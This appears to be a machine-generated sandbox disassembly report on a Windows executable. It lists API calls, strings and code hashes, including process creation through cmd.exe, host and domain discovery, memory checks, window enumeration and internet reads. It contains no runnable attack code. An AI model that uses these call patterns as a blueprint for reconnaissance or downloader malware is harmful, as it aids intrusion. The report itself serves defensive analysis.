                                      • __dosmaperr.LIBCMT ref: 00980FAB
                                      • GetFileType.KERNEL32(00000000), ref: 00980FB7
                                      • GetLastError.KERNEL32 ref: 00980FC1
                                      • __dosmaperr.LIBCMT ref: 00980FCA
                                      • CloseHandle.KERNEL32(00000000), ref: 00980FEA
                                      • CloseHandle.KERNEL32(?), ref: 00981134
                                      • GetLastError.KERNEL32 ref: 00981166
                                      • __dosmaperr.LIBCMT ref: 0098116D
                                      Strings
                                      Similarity
                                      • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                      • String ID: H
                                      • API String ID: 4237864984-2852464175
                                      • Opcode ID: ad0c9f7a81d36c8e8451f301b3b42e976a5f32399754a9a84d207ca2bd021585
                                      • Instruction ID: 7f3de645aaeb886522b3d77cb951d038db1db0ab7851f5d56fee2a06c528b8d2
                                      • Opcode Fuzzy Hash: ad0c9f7a81d36c8e8451f301b3b42e976a5f32399754a9a84d207ca2bd021585
                                      • Instruction Fuzzy Hash: B1A16832A181458FCF19EF68CC46BAE7BB4AF46324F14014AF815DB392DB358D46CB91

                                       Control-flow Graph
                                       • Graph of the function at 00977EC1 (basic blocks 00977EC1-009780DB), rendered as an image in the report; the node and edge list is not reproduced. No Windows API is called directly on the graph. Internal callees: 009661C3, 00965932, 00985580 (three sites, the _strrchr calls listed below), 00977661, 009780DC (the CreateProcessA wrapper whose graph opens this section), 00975508, 00975565, 009729C2, 009773E8, 0096595F.
                                      APIs
                                      • _strrchr.LIBCMT ref: 00977F05
                                      • _strrchr.LIBCMT ref: 00977F10
                                      • _strrchr.LIBCMT ref: 00977F37
                                      • _free.LIBCMT ref: 00977F6A
                                        • Part of subcall function 0096595F: IsProcessorFeaturePresent.KERNEL32(00000017,00965931,?,?,008B1F07,?,?,00000016,?,?,0096593E,00000000,00000000,00000000,00000000,00000000), ref: 00965961
                                        • Part of subcall function 0096595F: GetCurrentProcess.KERNEL32(C0000417,?,?,?), ref: 00965983
                                        • Part of subcall function 0096595F: TerminateProcess.KERNEL32(00000000), ref: 0096598A
                                      Strings
                                      Similarity
                                      • API ID: _strrchr$Process$CurrentFeaturePresentProcessorTerminate_free
                                      • String ID: .com
                                      • API String ID: 1283974128-4200470757
                                      • Opcode ID: 7f8dbd3d5378b2b270baf113b13094851dcffe663d1eb32efd44374c69a2af25
                                      • Instruction ID: 276cc3909477e0a840f1722f69ff49b09c86e8221abef43ea9411217eee99155
                                      • Opcode Fuzzy Hash: 7f8dbd3d5378b2b270baf113b13094851dcffe663d1eb32efd44374c69a2af25
                                      • Instruction Fuzzy Hash: 73512873904605AFDF10AEB48C45BAFBBA8EF81720F148569F818D7292FF718E049761

                                       Control-flow Graph
                                       • Graph of the function at 009776B6 (basic blocks 009776B6-00977A3C), rendered as an image in the report; the node and edge list is not reproduced. Windows APIs on the graph: CreatePipe, GetLastError, CloseHandle (two sites). Internal callees: 00942380, 009661B0, 009661C3, 00965932, 009423C6, 0096618D, 0097D47E, 00977822, 00977932, 00970C7A, 0096595F, 0097D3C7, 00974E7F, 00974D22, 00977A1B.
                                      APIs
                                      • CreatePipe.KERNEL32(?,?,0000000C,?,?,?,?,?,?,?,?,009CCFE0,00000028,00964F9F,?,00000400), ref: 00977764
                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,009CCFE0,00000028,00964F9F,?,00000400,00000080,009CCBE0,00000028), ref: 0097776E
                                      • __dosmaperr.LIBCMT ref: 00977775
                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,009CCFE0,00000028,00964F9F,?,00000400,00000080,009CCBE0,00000028), ref: 009777A0
                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,009CCFE0,00000028,00964F9F,?,00000400,00000080,009CCBE0,00000028), ref: 009777A9
                                      Similarity
                                      • API ID: CloseHandle$CreateErrorLastPipe__dosmaperr
                                      • String ID:
                                      • API String ID: 155357802-0
                                      • Opcode ID: 2c6973b828a4992128156b648dd0a53c5f403f59d80509411d43fff497bc6496
                                      • Instruction ID: c0af205d605b3e0d4cacddd772bb272573a4fa96e2c848b58830b872b1bcf048
                                      • Opcode Fuzzy Hash: 2c6973b828a4992128156b648dd0a53c5f403f59d80509411d43fff497bc6496
                                      • Instruction Fuzzy Hash: 84714C72A1D2028FCB05AFB8DC45B9E77A5AF85324F188219F458CF2E2D734D802D750
                                      APIs
                                      • WaitForSingleObject.KERNEL32(00000010,00000000,00000000,00000000,00000000,?,?,0096559C,00000000,00000000,00000001,?,009CCBC0,00000010,008B8943,00000000), ref: 00977474
                                      • GetExitCodeProcess.KERNEL32(00000010,00000000), ref: 00977483
                                      • GetLastError.KERNEL32(?,?,0096559C,00000000,00000000,00000001,?,009CCBC0,00000010,008B8943,00000000), ref: 0097749A
                                      • __dosmaperr.LIBCMT ref: 009774BE
                                      • CloseHandle.KERNEL32(00000010,?,?,0096559C,00000000,00000000,00000001,?,009CCBC0,00000010,008B8943,00000000), ref: 009774D1
                                      Similarity
                                      • API ID: CloseCodeErrorExitHandleLastObjectProcessSingleWait__dosmaperr
                                      • String ID:
                                      • API String ID: 2013101682-0
                                      • Opcode ID: ff81c91e6ce1ba9fd8108e51aa7113889108a05ad0bda5360c5beb28bfa07127
                                      • Instruction ID: 880b8830b6995b471449f74a76434db286ed25a9bfe92baf2b72f707dcfe65f2
                                      • Opcode Fuzzy Hash: ff81c91e6ce1ba9fd8108e51aa7113889108a05ad0bda5360c5beb28bfa07127
                                      • Instruction Fuzzy Hash: A011E93320C211ABC7105FDD8C84A6AFF6EEF82324B258215F95C87260EB348D018BA1
                                      APIs
                                      • GetComputerNameExW.KERNEL32(00000000,?,?,BA3649C5,?), ref: 008C4101
                                      • DsRoleGetPrimaryDomainInformation.NETAPI32(00000000,00000001,?,?,00000000,?,?,?), ref: 008C41A0
                                      Similarity
                                      • API ID: ComputerDomainInformationNamePrimaryRole
                                      • String ID: Empty$_D:
                                      • API String ID: 1590873629-2874341529
                                      • Opcode ID: df7e5ab5743cb4d753eb936fd351f72071cbdefc2d901a89d253466119c36b53
                                      • Instruction ID: d113e9de387377d9bac8b390d36c218f0def527476e6d60d81ddd769225b3a5b
                                      • Opcode Fuzzy Hash: df7e5ab5743cb4d753eb936fd351f72071cbdefc2d901a89d253466119c36b53
                                      • Instruction Fuzzy Hash: 0EF1AC70A102588BEB28DB28CD55BADB7B6FB81304F54C2DCD089A7295DF759AC48FD0
                                      APIs
                                      • GetLastError.KERNEL32(BA3649C5,?,00000000,?), ref: 0093D277
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 0093D35B
                                      • GetFileAttributesW.KERNEL32(?,BA3649C5,?,?,?,?,?,?,?,009907C0,000000FF,?,008B4A32), ref: 0093D3B2
                                      Strings
                                      • boost::filesystem::status, xrefs: 0093D30D
                                      Similarity
                                      • API ID: AttributesErrorException@8FileLastThrow
                                      • String ID: boost::filesystem::status
                                      • API String ID: 1873943377-3746320807
                                      • Opcode ID: dc3a11ce50061a4dbdd6a146104026dc9a345114cf367d4d25837b5ed66321d8
                                      • Instruction ID: 5a4d6f2fabd2e561907cb7debc36d539fc7cd53e8837822e722ba848f776bcef
                                      • Opcode Fuzzy Hash: dc3a11ce50061a4dbdd6a146104026dc9a345114cf367d4d25837b5ed66321d8
                                      • Instruction Fuzzy Hash: 3B418272D016189BCB10DF98E895BEEB7B8FF45314F14412AE826A7294D774AD04CF91
                                      APIs
                                      • GetFileAttributesW.KERNEL32(?,BA3649C5,?,?,?,?,?,?,?,009907C0,000000FF,?,008B4A32), ref: 0093D3B2
                                      • CreateFileW.KERNEL32(?,00000000,00000007,00000000,00000003,02000000,00000000,?,?,?,?,?,?,?,?,009907C0), ref: 0093D44D
                                        • Part of subcall function 0093D060: CreateFileW.KERNEL32(0093D47E,00000008,00000007,00000000,00000003,02200000,00000000,BA3649C5,?,00000000,?,0093D47E,?), ref: 0093D0A3
                                        • Part of subcall function 0093D060: CloseHandle.KERNEL32(00000000), ref: 0093D124
                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,009907C0), ref: 0093D499
                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,009907C0), ref: 0093D4A9
                                      Similarity
                                      • API ID: CloseFileHandle$Create$Attributes
                                      • String ID:
                                      • API String ID: 2696689969-0
                                      • Opcode ID: 031186d2737fdcc2dbf622715f94addd954ee4f67e585a1db9cec23fd55e92b3
                                      • Instruction ID: 84073873ff5242f840dece837a04778a272036b9aa49e3d18488631c4ca86d05
                                      • Opcode Fuzzy Hash: 031186d2737fdcc2dbf622715f94addd954ee4f67e585a1db9cec23fd55e92b3
                                      • Instruction Fuzzy Hash: 70519F71E01214EFDB04DFA8E895BAEBBB8EF48314F148129E815A7391D734AD04CFA1
                                      Similarity
                                      • API ID: _free
                                      • String ID: COMSPEC$cmd.exe
                                      • API String ID: 269201875-2256226045
                                      • Opcode ID: 66787675963ee615deb00a8a19f2555c7c44b0079514549a611a9d6b2c05a04e
                                      • Instruction ID: e0fa024c546f1e78550d85b0fd979c438699f7f456eb06a2a8f8ae575c1d4f39
                                      • Opcode Fuzzy Hash: 66787675963ee615deb00a8a19f2555c7c44b0079514549a611a9d6b2c05a04e
                                      • Instruction Fuzzy Hash: 4631EB71D006199B8B10AFE8CD829BFBBBCDE81764F160366F804A7251DA304E05C7E1
                                      APIs
                                      • NetApiBufferFree.NETAPI32(00000000), ref: 008C4DC6
                                      • NetApiBufferFree.NETAPI32(00000000), ref: 008C4DE2
                                      Similarity
                                      • API ID: BufferFree
                                      • String ID: Default
                                      • API String ID: 710964542-753088835
                                      • Opcode ID: db966e92181a23f36e3c08c18bf52a03083b3f18eae4a54df637a4ccbf4298e6
                                      • Instruction ID: 64ac1584be8cb007ce0456dd0adc4e4414e57b2104af19b2bfc142977accbc3e
                                      • Opcode Fuzzy Hash: db966e92181a23f36e3c08c18bf52a03083b3f18eae4a54df637a4ccbf4298e6
                                      • Instruction Fuzzy Hash: 0CF0AF35A152099BCB18EF98D4A1BADB7B1FB48321F10422ED916A3280DB36A900CB90
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 9891b14e3667b87ad296c8505911017de47da1405de26353fbea5a17f544a5f0
                                      • Instruction ID: d9a4d6a16156ad6fe4823f7b611869eb3e91d480caf6b4df5e8b7d34bf437db0
                                      • Opcode Fuzzy Hash: 9891b14e3667b87ad296c8505911017de47da1405de26353fbea5a17f544a5f0
                                      • Instruction Fuzzy Hash: C651F872D0460AAFCF119FA4CC45FEE7BB8EF85310F168455F409A7292D7B59901DB60
                                      APIs
                                      • CloseHandle.KERNEL32(00000000,00000000,0092974C,?,0097607A,0092974C,009CCF80,0000000C), ref: 009761B2
                                      • GetLastError.KERNEL32(?,0097607A,0092974C,009CCF80,0000000C), ref: 009761BC
                                      • __dosmaperr.LIBCMT ref: 009761E7
                                      Similarity
                                      • API ID: CloseErrorHandleLast__dosmaperr
                                      • String ID:
                                      • API String ID: 2583163307-0
                                      • Opcode ID: 8b7fb3714a12fd37462d1060b2cd0d13bcb313abee309a836557405fa3d53e56
                                      • Instruction ID: 5c31982a4440dc879d53b501483e31a913a635c8af801e3b4b1313eaa19f4e3f
                                      • Opcode Fuzzy Hash: 8b7fb3714a12fd37462d1060b2cd0d13bcb313abee309a836557405fa3d53e56
                                      • Instruction Fuzzy Hash: 3C012B3360D56016D61467785C8D77E676D8FC2734F65C559F80CC71D3DA249C859190
                                      APIs
                                      • SetFilePointerEx.KERNEL32(00000000,00000000,00929776,00000000,00000002,00929776,00000000,?,?,?,0097980B,00000000,00000000,00929776,00000002), ref: 00979795
                                      • GetLastError.KERNEL32(?,0097980B,00000000,00000000,00929776,00000002,?,0096B262,?,00000000,00000000,00000001,?,00929776,?,0096B317), ref: 0097979F
                                      • __dosmaperr.LIBCMT ref: 009797A6
                                      Similarity
                                      • API ID: ErrorFileLastPointer__dosmaperr
                                      • String ID:
                                      • API String ID: 2336955059-0
                                      • Opcode ID: 1affe48ba39c58362adf0f28b567406ae92084309b6d4c4b1d27876fed596e09
                                      • Instruction ID: 996b6082234a75e40f79086d3bf38849ea6adec5a8db4a53e4b150cf13822274
                                      • Opcode Fuzzy Hash: 1affe48ba39c58362adf0f28b567406ae92084309b6d4c4b1d27876fed596e09
                                      • Instruction Fuzzy Hash: 23014C33A28115BFCB099FA9DC05DAE7B2DEFC5320F344249F8198B190EA719D519BA0
                                      APIs
                                      • InternetConnectW.WININET(?,?,00000050,00000000,00000000,00000003,00000000,00000000), ref: 008C6BE4
                                      Similarity
                                      • API ID: ConnectInternet
                                      • String ID: 0.0.0.1
                                      • API String ID: 3050416762-2547487335
                                      • Opcode ID: 9209dd467b8f80fb1086aa5e55054bc8364d5003a76abb8d1bffed634bdd4909
                                      • Instruction ID: 9b7daa381e52b053aa94b40dbcd28c4969c67fbbc02f0f5f14feea8a1f7e5138
                                      • Opcode Fuzzy Hash: 9209dd467b8f80fb1086aa5e55054bc8364d5003a76abb8d1bffed634bdd4909
                                      • Instruction Fuzzy Hash: D0519F70A101589BDB18DF18CC85BADB7B6FF84304F9081ADE549E7291D734EA94CF54
                                      APIs
                                      • GlobalMemoryStatusEx.KERNEL32(?,00000000), ref: 008C4C0D
                                      Similarity
                                      • API ID: GlobalMemoryStatus
                                      • String ID: @
                                      • API String ID: 1890195054-2766056989
                                      • Opcode ID: 0526797d66f972eb7e43dc67fa639d9ebe1813ac54e7ec082066bb541ea6ae85
                                      • Instruction ID: 1ba1c14b3717592ac409a1d0ede6197a1ed92b170a6dbb0ade6145763612255b
                                      • Opcode Fuzzy Hash: 0526797d66f972eb7e43dc67fa639d9ebe1813ac54e7ec082066bb541ea6ae85
                                      • Instruction Fuzzy Hash: 8F21AE71A28B449BC320EF39D842B1BB7F5AF9AB40F400B1EF48597251EB70A85487D2
                                      APIs
                                      • WriteFile.KERNEL32(7408458B,?,?,?,00000000,?,0096B33E,E0830C40,?,00975F7E,00929776,0096B33E,?,0096B33E,0096B33E,00929776), ref: 00975ADD
                                      • GetLastError.KERNEL32(?,00975F7E,00929776,0096B33E,?,0096B33E,0096B33E,00929776,0096B33E,?,009CCF60,00000014,00962374,00000000,8304488B,00929776), ref: 00975B06
                                      Similarity
                                      • API ID: ErrorFileLastWrite
                                      • String ID:
                                      • API String ID: 442123175-0
                                      • Opcode ID: 228e0743419bdbdffa4692eae9cf5986b7e7fbe95e54bb42eedf6cea6120bae3
                                      • Instruction ID: eec45f6d7753210917976ec0ddb28e49d7642ab02c7265e9b0a44861dff782cb
                                      • Opcode Fuzzy Hash: 228e0743419bdbdffa4692eae9cf5986b7e7fbe95e54bb42eedf6cea6120bae3
                                      • Instruction Fuzzy Hash: 9D21A136A147199FCB24CF59CD80BE9B3F9EB48301F1184AAE94AD7251D770AE85CF60
                                      Similarity
                                      • API ID: Xfsopenstd::_
                                      • String ID:
                                      • API String ID: 2914972069-0
                                      • Opcode ID: f1ceb20ccfb40fa97923cfbfa072a47e064e6883a1f176c1ad72afeba8734c22
                                      • Instruction ID: d1168b570adb049fc986de67732ebf7810ff1f57108732fe8208ab986d3241a0
                                      • Opcode Fuzzy Hash: f1ceb20ccfb40fa97923cfbfa072a47e064e6883a1f176c1ad72afeba8734c22
                                      • Instruction Fuzzy Hash: 86112132A31231A7CF250E68FC06BBA779DAF81790F184034FD46DA1ADEA64DC02C2D0
                                      APIs
                                      • GetStdHandle.KERNEL32(000000F6), ref: 009743A8
                                      • GetFileType.KERNEL32(00000000), ref: 009743BA
                                      Similarity
                                      • API ID: FileHandleType
                                      • String ID:
                                      • API String ID: 3000768030-0
                                      • Opcode ID: 7ca9cc48b2c10c83c14cd02a9cb155ee18beaa0cebf1c7dc66d7829a782a5b86
                                      • Instruction ID: baf600f70e9be1e8d9edf3a118bd94ec67d1e0e2c0004459971ead1897d2f7f6
                                      • Opcode Fuzzy Hash: 7ca9cc48b2c10c83c14cd02a9cb155ee18beaa0cebf1c7dc66d7829a782a5b86
                                      • Instruction Fuzzy Hash: B61187336487414AD7308E3E8D88632BA99AB56330B384B5AD1BEC65F3C734D986E645
                                      APIs
                                      • InternetReadFile.WININET(?,?,00000400,?), ref: 008C7011
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                       • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: FileInternetRead
                                      • String ID:
                                      • API String ID: 778332206-0
                                      • Opcode ID: f22dbdc1ccacdfa0725f02f2488b727874657aae8c4e75c923c9280d70174801
                                      • Instruction ID: a06a6a4dc0520a026b9d5dfd5f6379dd9af0beabf5b21ef670c1c0268a78ac16
                                      • Opcode Fuzzy Hash: f22dbdc1ccacdfa0725f02f2488b727874657aae8c4e75c923c9280d70174801
                                      • Instruction Fuzzy Hash: CB51B2B1A101288BDB28CF24CD85B9DB7B5FF85304F14829EE508E7291E735AAD4CF59
                                      APIs
                                      • GlobalMemoryStatusEx.KERNEL32(BA3649C5), ref: 008C656F
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                       • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: GlobalMemoryStatus
                                      • String ID:
                                      • API String ID: 1890195054-0
                                      • Opcode ID: 0802097b847cf6fc492bd2394e0566fe3094d0647da1ea3c6e4317df80c3dc2c
                                      • Instruction ID: 9036dd8c2464f7ec763426f3cd19c5b1777833785c4db32e72e3bba86031539e
                                      • Opcode Fuzzy Hash: 0802097b847cf6fc492bd2394e0566fe3094d0647da1ea3c6e4317df80c3dc2c
                                      • Instruction Fuzzy Hash: E6117F3060470447DA249B24D552B2E73F4EF95720F40066DEE4A8B7C4FA36EC108683
                                      APIs
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 008F7337
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                       • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: Exception@8Throw
                                      • String ID:
                                      • API String ID: 2005118841-0
                                      • Opcode ID: 20c7e6965f411f5cfead73da4e2354177fb34f2b60b0e9490f790c397e6bec58
                                      • Instruction ID: f772151f704691fc26cd9291fa96e0b17e973072075218dcdbcf06eaf89850be
                                      • Opcode Fuzzy Hash: 20c7e6965f411f5cfead73da4e2354177fb34f2b60b0e9490f790c397e6bec58
                                      • Instruction Fuzzy Hash: FE114C75A04209AFCB14DFE8D844FAEBBB8FF88710F50455AF90697744DA30A904CBA0
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                       • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: __wsopen_s
                                      • String ID:
                                      • API String ID: 3347428461-0
                                      • Opcode ID: da501fe5f73812d84e4204249741587ac87c6c3c8d703e7432da90418fb98653
                                      • Instruction ID: 4b285c5d4f4c124ef57533da7a0743513258f3c1b8572ea5495de80916c1c978
                                      • Opcode Fuzzy Hash: da501fe5f73812d84e4204249741587ac87c6c3c8d703e7432da90418fb98653
                                      • Instruction Fuzzy Hash: E01118B290810AAFCB05DF58E941A9B7BF9EF48310F11849AF808AB351D671D9118BA5
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                       • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 42fd40b6c94fa41b560acd951f71edddf97df59d1a9087cb6c0cde23487a5f9d
                                      • Instruction ID: e2447de96deb7213300db17475f9b24cdd8295e8fffd5527b5e6d36bdf8668a5
                                      • Opcode Fuzzy Hash: 42fd40b6c94fa41b560acd951f71edddf97df59d1a9087cb6c0cde23487a5f9d
                                      • Instruction Fuzzy Hash: 0DF0C833901E145BD7313B69CC06B6A339C9FD2374F154B15F82A971D1DB78E90786A2
                                      APIs
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 0094236B
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                       • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: Exception@8Throw
                                      • String ID:
                                      • API String ID: 2005118841-0
                                      • Opcode ID: b776112fa388366c475336c270f322ee7b34d9adabf6993e6c62f2943638f0bf
                                      • Instruction ID: c846f0d12dca8875359773a75cb541015314c86d726c2c4afe31cbd19c66fe4a
                                      • Opcode Fuzzy Hash: b776112fa388366c475336c270f322ee7b34d9adabf6993e6c62f2943638f0bf
                                      • Instruction Fuzzy Hash: 03E0D83480070DB6CB14BEB4DC16E6E3B2C1E40760B604721B824A50E3EF30E6DAC281
                                      APIs
                                        • Part of subcall function 0092A061: std::_Lockit::_Lockit.LIBCPMT ref: 0092A08A
                                        • Part of subcall function 0092A061: std::_Lockit::~_Lockit.LIBCPMT ref: 0092A0B2
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00918784
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                       • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: Lockitstd::_$Exception@8Lockit::_Lockit::~_Throw
                                      • String ID:
                                      • API String ID: 2653793986-0
                                      • Opcode ID: 4d4d5b0bff41658a4492ae1b27b59684552ebab20093406eb8ddf5862904685d
                                      • Instruction ID: 76b2f9ec438472d3175a490c676f9e7ec1a5d5e233baa4a7b2bb14bcd21d5c4b
                                      • Opcode Fuzzy Hash: 4d4d5b0bff41658a4492ae1b27b59684552ebab20093406eb8ddf5862904685d
                                      • Instruction Fuzzy Hash: 2FE0E562D0011426D510B2656C86BFF269C4FC1B95F140038FC04D2263FF24D98E81F3
                                      APIs
                                      • RtlAllocateHeap.NTDLL(00000000,?,?,?,0095833C,?,?,?,?,?,008B1F07,?,?,?), ref: 009763C5
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                       • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: AllocateHeap
                                      • String ID:
                                      • API String ID: 1279760036-0
                                      • Opcode ID: 3c5cd231e2b1728d2506f47d371111ba29a64cca01671acd4cc8b82839e42739
                                      • Instruction ID: 2c7f5008d5ef336831e245158855be757f5044be2ebbc5c00fe8bb0fbc17daf0
                                      • Opcode Fuzzy Hash: 3c5cd231e2b1728d2506f47d371111ba29a64cca01671acd4cc8b82839e42739
                                      • Instruction Fuzzy Hash: CEE06D23609A30A7DA223A7A9C01B5A7A4CAF827A0F15C221FC1DA6191DFA5EC41D5E1
                                      APIs
                                      • EnumWindows.USER32(008C5A90,?), ref: 008C60C0
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                       • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: EnumWindows
                                      • String ID:
                                      • API String ID: 1129996299-0
                                      • Opcode ID: 400664d8a97a0cfb1d7d672d43fa6e49ba770c24c0a2fea6acdb2989a5f520cf
